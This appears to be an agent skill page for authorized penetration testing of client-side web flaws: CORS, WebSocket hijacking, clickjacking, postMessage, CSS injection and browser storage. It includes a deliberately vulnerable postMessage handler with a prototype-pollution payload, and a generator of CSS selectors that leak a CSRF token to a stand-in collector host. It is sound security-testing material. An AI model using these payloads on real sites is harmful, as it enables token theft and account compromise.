pentest-client-advanced

Pentest Client Advanced

Purpose

Test advanced client-side attack surfaces beyond XSS. Six WSTG-CLNT items remain unchecked in Shannon's pipeline; they are distinct attack classes that need their own methodology rather than the taint analysis used for XSS.

Prerequisites

Authorization Requirements

  • Written authorization with client-side testing scope
  • Test domains for hosting PoC HTML pages (attacker-controlled origin)
  • Browser testing environment with DevTools access
  • Target user simulation — ability to test cross-origin interactions

Environment Setup

  • Modern browser with DevTools (Chrome/Firefox)
  • Burp Suite for intercepting WebSocket and cross-origin traffic
  • Local HTTP server for hosting PoC pages (python -m http.server)
  • Playwright for automated browser-based attack verification

Core Workflow

  1. CORS Misconfiguration: Test reflected Origin in the Access-Control-Allow-Origin (ACAO) header, null origin trust (reachable from a sandboxed iframe), subdomain and unescaped-regex wildcard abuse (evilapp.example.com, app.example.com.attacker.net), and credential leakage when Access-Control-Allow-Credentials: true is combined with a permissive ACAO (WSTG-CLNT-07).
  2. WebSocket Security: Missing auth on WS upgrade, CSWSH (Cross-Site WebSocket Hijacking), injection through WS messages, missing origin validation (WSTG-CLNT-10).
  3. Clickjacking: Missing X-Frame-Options / CSP frame-ancestors, UI redressing, drag-and-drop hijacking, multi-step clickjacking chains (WSTG-CLNT-09).
  4. postMessage Abuse: Missing origin validation in message handlers, DOM manipulation via cross-origin messages, prototype pollution through postMessage (WSTG-CLNT-11).
  5. CSS Injection: Data exfiltration via CSS attribute selectors + background-image, CSS-based keylogging, style injection for UI manipulation (WSTG-CLNT-05).
  6. Client-Side Storage: Sensitive data in localStorage/sessionStorage, IndexedDB exposure, service worker cache poisoning (tracked here under WSTG-CLNT-06; note that WSTG-CLNT-06 is Client-Side Resource Manipulation, while WSTG files browser storage under WSTG-CLNT-12, Testing Browser Storage).
  7. PoC Construction: Build HTML pages demonstrating each attack with real impact.
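Steps 1 and 3 above both come down to reading response headers correctly. The following is an added example, not code from the skill or from Shannon: a Node.js triage helper that classifies a CORS response for the probe Origin that was sent (reflection, null origin, wildcard, and whether credentials make it exploitable) and checks whether the page can be framed. The target origin, the probe origins, and the SAMPLE response headers are constructed values.

```javascript
// Added example: header triage for CORS (WSTG-CLNT-07) and clickjacking (WSTG-CLNT-09).
// Feed it headers captured with curl -I or Burp; matching is case-insensitive.

const TARGET_ORIGIN = 'https://app.example.com'; // assumed target, not from the skill

// Probe origins a tester sends in the Origin request header (constructed).
const PROBES = {
  reflected: 'https://attacker.example.net',
  nullOrigin: 'null',                                       // sandboxed iframe, data: URL, file:
  prefix: 'https://app.example.com.attacker.example.net',   // catches ^https://app\.example\.com
  suffix: 'https://evilapp.example.com',                    // catches unescaped example.com$
};

function header(headers, name) {
  const key = Object.keys(headers).find(k => k.toLowerCase() === name.toLowerCase());
  return key === undefined ? null : headers[key];
}

// Classify one CORS response given the Origin that was sent with the request.
function classifyCors(probeOrigin, responseHeaders) {
  const acao = header(responseHeaders, 'Access-Control-Allow-Origin');
  const acac = (header(responseHeaders, 'Access-Control-Allow-Credentials') || '').trim() === 'true';
  if (acao === null) return { vulnerable: false, credentialed: false, reason: 'no ACAO header' };
  if (acao === TARGET_ORIGIN) return { vulnerable: false, credentialed: acac, reason: 'ACAO pinned to own origin' };
  if (acao === '*') {
    // Browsers refuse to expose a credentialed response behind ACAO: *, so only
    // unauthenticated content is readable cross-origin even if ACAC is set.
    return { vulnerable: true, credentialed: false, reason: 'wildcard ACAO (unauthenticated data only)' };
  }
  if (acao === probeOrigin) {
    const how = probeOrigin === 'null' ? 'null origin trusted' : 'Origin reflected';
    return {
      vulnerable: true,
      credentialed: acac,
      reason: how + (acac ? '; with ACAC true the authenticated response is readable cross-origin'
                          : '; without ACAC only unauthenticated data leaks'),
    };
  }
  return { vulnerable: false, credentialed: acac, reason: `ACAO is ${acao}, not the probe origin` };
}

// Clickjacking: the page must refuse framing via CSP frame-ancestors (preferred) or X-Frame-Options.
function checkFraming(responseHeaders) {
  const csp = header(responseHeaders, 'Content-Security-Policy') || '';
  const xfo = (header(responseHeaders, 'X-Frame-Options') || '').trim().toUpperCase();
  const fa = csp.split(';').map(d => d.trim()).find(d => d.toLowerCase().startsWith('frame-ancestors'));
  if (fa) {
    // frame-ancestors wins over X-Frame-Options when both are present.
    const sources = fa.split(/\s+/).slice(1);
    if (sources.includes('*') || sources.includes('https:')) return { frameable: true, reason: `frame-ancestors too broad: ${fa}` };
    return { frameable: false, reason: `CSP ${fa}` };
  }
  if (xfo === 'DENY' || xfo === 'SAMEORIGIN') return { frameable: false, reason: `X-Frame-Options ${xfo}` };
  if (xfo.startsWith('ALLOW-FROM')) return { frameable: true, reason: 'ALLOW-FROM is not honoured by current browsers' };
  return { frameable: true, reason: 'no frame-ancestors or X-Frame-Options' };
}

// Constructed sample response: reflects the attacker origin with credentials and relies on ALLOW-FROM.
const SAMPLE = {
  'Access-Control-Allow-Origin': 'https://attacker.example.net',
  'Access-Control-Allow-Credentials': 'true',
  'X-Frame-Options': 'ALLOW-FROM https://partner.example.com',
};

console.log(classifyCors(PROBES.reflected, SAMPLE));
console.log(checkFraming(SAMPLE));
```

Run each probe origin in turn and keep the raw request/response pair for the report; a "vulnerable: true, credentialed: true" result is the one worth a PoC page that calls fetch with credentials: 'include' from the attacker origin.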

WSTG Coverage

WSTG ID        Test Name
WSTG-CLNT-05   CSS Injection
WSTG-CLNT-06   Client-Side Resource Manipulation
WSTG-CLNT-07   Cross-Origin Resource Sharing
WSTG-CLNT-09   Clickjacking
WSTG-CLNT-10   WebSocket Testing
WSTG-CLNT-11   Web Messaging
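For the Web Messaging row (WSTG-CLNT-11, step 4 of the workflow), the finding is almost always a message handler that never checks event.origin and then writes the payload into the DOM or merges it into application state. The following added example, not code from the skill, shows such a handler beside a hardened one and drives both with constructed MessageEvent-like objects so it runs under Node.js without a browser. TRUSTED_ORIGIN, the settings allow-list and the message shapes are assumptions made for the example; in the real page the status sink would be innerHTML versus textContent.

```javascript
// Added example: postMessage handler, vulnerable versus hardened (WSTG-CLNT-11).
// Events are plain objects shaped like MessageEvent: { origin, data }.

const TRUSTED_ORIGIN = 'https://app.example.com'; // assumed trusted sender

// Naive recursive merge: a JSON-parsed "__proto__" key walks onto Object.prototype.
function deepMerge(target, src) {
  for (const key of Object.keys(src)) {
    if (typeof src[key] === 'object' && src[key] !== null) {
      if (typeof target[key] !== 'object' || target[key] === null) target[key] = {};
      deepMerge(target[key], src[key]);
    } else {
      target[key] = src[key];
    }
  }
  return target;
}

// Vulnerable: no origin check, HTML sink, recursive merge of attacker-controlled JSON.
function vulnerableHandler(state, event) {
  const msg = typeof event.data === 'string' ? JSON.parse(event.data) : event.data;
  if (msg.type === 'setStatus') state.status = msg.html;                 // innerHTML in the real page
  if (msg.type === 'updateSettings') deepMerge(state.settings, msg.settings);
  return state;
}

// Hardened: exact origin comparison (not indexOf/endsWith), typed fields, flat allow-list.
const ALLOWED_SETTINGS = new Set(['theme', 'locale']);
function hardenedHandler(state, event) {
  if (event.origin !== TRUSTED_ORIGIN) return state;
  const msg = typeof event.data === 'string' ? JSON.parse(event.data) : event.data;
  if (msg === null || typeof msg !== 'object') return state;
  if (msg.type === 'setStatus' && typeof msg.text === 'string') state.status = msg.text; // textContent
  if (msg.type === 'updateSettings' && msg.settings && typeof msg.settings === 'object') {
    for (const [k, v] of Object.entries(msg.settings)) {
      if (ALLOWED_SETTINGS.has(k) && typeof v === 'string') state.settings[k] = v; // "__proto__" never passes
    }
  }
  return state;
}

// Constructed hostile message from an attacker-controlled origin. The string form matters:
// a {"__proto__": ...} key only becomes an own property when it arrives through JSON.parse.
const hostileEvent = {
  origin: 'https://attacker.example.net',
  data: '{"type":"updateSettings","settings":{"__proto__":{"polluted":"yes"}}}',
};

function freshState() { return { status: '', settings: { theme: 'light' } }; }

// Returns true if the hostile message polluted Object.prototype, then undoes the damage.
function runVulnerable() {
  vulnerableHandler(freshState(), hostileEvent);
  const polluted = ({}).polluted === 'yes';
  delete Object.prototype.polluted;
  return polluted;
}

// Returns the surviving settings and whether any pollution occurred.
function runHardened() {
  const state = freshState();
  hardenedHandler(state, hostileEvent);                                 // dropped: wrong origin
  hardenedHandler(state, { origin: TRUSTED_ORIGIN,
    data: { type: 'updateSettings', settings: { theme: 'dark', locale: 'de', isAdmin: 'true' } } });
  return { polluted: ({}).polluted === 'yes', settings: state.settings };
}

console.log('vulnerable polluted prototype:', runVulnerable());
console.log('hardened result:', runHardened());
```

When testing a real page, set a breakpoint in the message listener in DevTools, send a message from the PoC origin with window.postMessage(payload, '*') on an opener or iframe reference, and confirm whether execution reaches the sink before event.origin is compared to anything.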

Tool Categories

Category             Tools                                       Purpose
CORS Testing         CORScanner, curl, custom PoC pages          CORS misconfiguration detection
WebSocket            websocket-client (Python), Burp WS          WebSocket hijacking and injection
Clickjacking         custom HTML iframes, Playwright             UI redressing PoC construction
Browser Automation   Playwright, Puppeteer                       Automated client-side attack verification
Storage Analysis     Browser DevTools, custom JS                 localStorage/IndexedDB inspection
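The table lists no tool for the CSS Injection item (WSTG-CLNT-05, step 5 of the workflow); the attribute-selector exfiltration payload is normally generated by hand. The following added example, which is not part of the skill, builds those rules for one character position at a time and simulates the browser's selector matching so the full token recovery loop can be checked offline. The collector URL, the hex alphabet and the token value are constructed for the example.

```javascript
// Added example: CSS attribute-selector exfiltration (WSTG-CLNT-05).
// For a known prefix P, emit one rule per candidate character c; the browser only
// requests the background-image of the rule whose [value^="Pc"] actually matches.

const COLLECTOR = 'https://collector.example.net/leak'; // attacker-controlled, assumed
const ALPHABET = '0123456789abcdef';                    // assumed token alphabet (hex)

function exfilRules(inputName, knownPrefix) {
  return [...ALPHABET].map(c => {
    const guess = knownPrefix + c;
    return `input[name="${inputName}"][value^="${guess}"]{background-image:url(${COLLECTOR}?p=${encodeURIComponent(guess)})}`;
  });
}

// Stand-in for the browser: returns the URL the matching rule would fetch, or null.
function simulateMatch(rules, inputName, inputValue) {
  const pattern = /^input\[name="([^"]+)"\]\[value\^="([^"]+)"\]\{background-image:url\(([^)]+)\)\}$/;
  for (const rule of rules) {
    const m = rule.match(pattern);
    if (m && m[1] === inputName && inputValue.startsWith(m[2])) return m[3];
  }
  return null;
}

// Full recovery loop: each leaked character becomes the prefix for the next injection
// (one injected stylesheet per character, or a chained @import in practice).
// Stops early if the next character is outside ALPHABET, which is the usual reason a
// real run stalls.
function recoverToken(inputName, secretValue) {
  let prefix = '';
  while (prefix.length < secretValue.length) {
    const url = simulateMatch(exfilRules(inputName, prefix), inputName, secretValue);
    if (url === null) break;
    prefix = new URL(url).searchParams.get('p'); // searchParams already decodes the value
  }
  return prefix;
}

// Constructed page state: a CSRF token the attacker cannot read directly.
console.log(exfilRules('csrf', 'dea')[0]);
console.log('recovered:', recoverToken('csrf', 'deadbeef'));
```

Two caveats from practice: an input with type="hidden" has no box to paint, so the rule is usually rewritten with the general sibling combinator (input[name="csrf"][value^="a"] ~ *) to load the image on a rendered neighbour; and a strict Content-Security-Policy img-src or style-src blocks the collector request even when the selector matches, so check CSP before spending time on the payload.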

References

  • references/tools.md - Tool function signatures and parameters
  • references/workflows.md - Attack pattern definitions and test vectors
Weekly Installs: 24
GitHub Stars: 175
First Seen: Feb 18, 2026